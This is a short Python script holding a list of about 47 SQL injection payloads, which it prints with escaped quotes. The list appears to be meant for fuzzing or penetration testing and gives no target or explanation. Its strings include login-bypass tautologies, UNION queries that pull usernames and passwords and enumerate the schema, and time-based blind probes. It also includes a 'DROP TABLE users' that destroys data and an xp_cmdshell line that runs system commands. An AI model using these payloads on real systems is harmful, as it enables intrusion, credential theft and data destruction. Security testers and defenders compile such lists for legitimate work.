sql_injection_payloads = [
    "' OR '1'='1",
    "' OR 1=1 --",
    "' OR 1=1#",
    "' OR 1=1/*",
    "' OR '1'='1' --",
    "\" OR \"1\"=\"1",
    "\" OR 1=1 --",
    "\" OR 1=1#",
    "\" OR 1=1/*",
    "'; EXEC xp_cmdshell('whoami'); --",
    "' UNION SELECT NULL, NULL, NULL --",
    "' UNION SELECT 1, 'abc', NULL --",
    "' UNION SELECT username, password FROM users --",
    "' AND 1=2 UNION SELECT NULL, version() --",
    "' AND 1=0 UNION SELECT table_name, column_name FROM information_schema.columns --",
    "' AND ASCII(SUBSTRING(@@version, 1, 1)) = 77 --",
    "'; DROP TABLE users; --",
    "'; WAITFOR DELAY '0:0:5' --",
    "' OR SLEEP(5) --",
    "'||(SELECT pg_sleep(5))--",
    "' OR 1=1 LIMIT 1 OFFSET 1 --",
    "' OR EXISTS(SELECT * FROM users) --",
    "' OR NOT EXISTS(SELECT * FROM users) --",
    "' AND EXISTS(SELECT * FROM users WHERE username = 'admin') --",
    "admin' --",
    "admin' #",
    "admin'/*",
    "' or '' = '",
    "') or ('1'='1",
    "')) or (('1'='1",
    "\")) or ((\"1\"=\"1",
    "' AND '1'='1",
    "' AND 'x'='x",
    "' AND 1=1 --",
    "' OR 1=1;--",
    "' OR 'a'='a",
    "' OR 1=1 ORDER BY 1--",
    "' OR 1=1 ORDER BY 2--",
    "' OR 1=1 ORDER BY 3--",
    "' GROUP BY columnnames having 1=1 --",
    "'; SELECT * FROM users --",
    "' OR ''='",
    "' or 0=0 --",
    "' OR 'x'='x'; --",
    "' or sleep(5)--",
    "' OR benchmark(10000000,MD5(1))--",
    "' UNION SELECT ALL FROM users --"
]
for string in sql_injection_payloads:
    string = string.replace("\"", "\\\"") # escape
    print("\""+string+"\"")
